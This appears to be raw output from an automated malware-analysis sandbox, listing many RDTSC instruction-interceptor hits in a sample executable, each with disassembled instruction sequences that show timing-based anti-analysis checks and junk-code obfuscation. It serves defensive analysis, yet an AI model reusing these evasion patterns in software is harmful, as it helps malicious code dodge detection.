Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 48C347 second address: 48C34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 48C34B second address: 48C3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FD180B5C158h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jmp 00007FD180B5C165h 0x00000029 push 00000000h 0x0000002b cld 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FD180B5C158h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 movzx ebx, si 0x0000004b push eax 0x0000004c push ecx 0x0000004d je 00007FD180B5C15Ch 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 48D355 second address: 48D359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 48A7C3 second address: 48A7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 48E50A second address: 48E517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 48E517 second address: 48E51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 48F287 second address: 48F2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 sub edi, dword ptr [ebp+122D3A88h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FD1807ED548h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push edi 0x0000002c xor dword ptr [ebp+122D2FC4h], ebx 0x00000032 pop ebx 0x00000033 push 00000000h 0x00000035 mov edi, 4BEB6400h 0x0000003a xchg eax, esi 0x0000003b jns 00007FD1807ED54Eh 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jnl 00007FD1807ED548h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 491278 second address: 49127C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 49127C second address: 49128A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4301BD second address: 4301C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4A0FB1 second address: 4A0FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4A30BA second address: 4A30C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4A30C0 second address: 4A30C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4A32ED second address: 4A32F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4A8328 second address: 4A8341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED555h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4A8341 second address: 4A8347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4A8347 second address: 4A834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4AF444 second address: 4AF489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FD180B5C156h 0x0000000b pop eax 0x0000000c jmp 00007FD180B5C166h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD180B5C165h 0x0000001a pushad 0x0000001b jp 00007FD180B5C156h 0x00000021 push edx 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 475EDA second address: 45CEAE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e call dword ptr [ebp+122D2EE9h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FD1807ED553h 0x0000001c jmp 00007FD1807ED54Bh 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 475F68 second address: 475F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47DC5A second address: 47DC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 476479 second address: 47647F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 476721 second address: 47672A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47672A second address: 47672E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 47672E second address: 476752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnc 00007FD1807ED553h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 476752 second address: 47676E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jnc 00007FD180B5C156h 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 477065 second address: 477069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 45D9EB second address: 45D9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B2D2B second address: 4B2D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B2D31 second address: 4B2D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B3453 second address: 4B3457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B3614 second address: 4B3618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B960F second address: 4B9615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B9615 second address: 4B9655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FD180B5C15Bh 0x0000000a jmp 00007FD180B5C15Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FD180B5C164h 0x00000018 jmp 00007FD180B5C15Eh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jo 00007FD180B5C156h 0x00000026 pushad 0x00000027 popad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B84B0 second address: 4B84B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B8D25 second address: 4B8D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B8D29 second address: 4B8D53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD1807ED558h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnl 00007FD1807ED546h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B8D53 second address: 4B8D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B8D59 second address: 4B8D67 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B8D67 second address: 4B8D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B8D6B second address: 4B8D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FD1807ED552h 0x00000010 jng 00007FD1807ED546h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B8D83 second address: 4B8D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD180B5C15Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B8EB3 second address: 4B8EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4B8EBA second address: 4B8F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD180B5C15Ah 0x00000008 jmp 00007FD180B5C15Dh 0x0000000d jmp 00007FD180B5C15Eh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007FD180B5C163h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 42CA59 second address: 42CA6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 42CA6C second address: 42CA74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BEE8D second address: 4BEE9D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD1807ED546h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BEE9D second address: 4BEEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD180B5C169h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BF3E9 second address: 4BF3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BF3ED second address: 4BF40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FD180B5C160h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BF574 second address: 4BF589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD1807ED550h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BF589 second address: 4BF59D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BFA48 second address: 4BFA65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007FD1807ED546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD1807ED54Ch 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BFA65 second address: 4BFA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BFA6A second address: 4BFA9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD1807ED54Fh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD1807ED559h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BFA9A second address: 4BFA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BFA9E second address: 4BFAA8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4BE340 second address: 4BE346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C238F second address: 4C23C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD1807ED556h 0x00000008 jmp 00007FD1807ED54Dh 0x0000000d popad 0x0000000e jno 00007FD1807ED548h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C23C7 second address: 4C23CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C23CE second address: 4C23E8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD1807ED54Eh 0x00000008 jbe 00007FD1807ED54Eh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C5391 second address: 4C5397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C92C8 second address: 4C92F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED553h 0x0000000b popad 0x0000000c jl 00007FD1807ED564h 0x00000012 js 00007FD1807ED54Eh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C92F2 second address: 4C92F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C92F9 second address: 4C9301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C8B5C second address: 4C8B89 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FD180B5C156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD180B5C15Eh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FD180B5C158h 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pop eax 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C8CD0 second address: 4C8CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4CC75A second address: 4CC760 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4CC8EF second address: 4CC8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4D2965 second address: 4D2969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 476BD1 second address: 476BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED54Ch 0x00000009 popad 0x0000000a js 00007FD1807ED54Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4D928F second address: 4D92B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD180B5C168h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4D93FA second address: 4D9418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED553h 0x00000009 jg 00007FD1807ED546h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4D9572 second address: 4D9580 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4D9580 second address: 4D9584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4D9584 second address: 4D958A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4D9BA5 second address: 4D9BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FD1807ED54Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4D9BB8 second address: 4D9BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD180B5C156h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DA9B9 second address: 4DA9BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DACCB second address: 4DACD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FD180B5C156h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DACD7 second address: 4DACE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DAFB5 second address: 4DAFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD180B5C15Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DAFCC second address: 4DAFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DFF6F second address: 4DFF75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DEFB5 second address: 4DEFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DEFB9 second address: 4DEFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DEFBF second address: 4DEFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED551h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DF190 second address: 4DF194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4DF50A second address: 4DF514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD1807ED546h 0x0000000a rdtsc
